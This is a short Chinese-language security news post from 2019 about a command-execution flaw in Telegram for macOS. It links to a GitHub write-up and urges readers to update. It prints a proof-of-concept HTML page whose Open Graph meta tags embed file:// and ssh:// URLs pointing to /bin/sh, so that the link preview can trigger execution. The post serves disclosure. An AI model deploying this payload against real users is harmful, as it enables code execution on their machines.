Telegram(macOS v4.9.155353) 代码执行漏洞 PoC 业界新闻

Telegram 是啥不多说:看到了的赶紧更新吧。

详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open

给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。

POC 如下:

<html>

</head>
    <!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
    <meta property="og:url"   content="file://google.com/bin/sh" />
    <meta property="og:type"  content="article" />
    <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
    <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
</head>

</html>
标签: 漏洞

admin 发布于  2019-12-9 21:49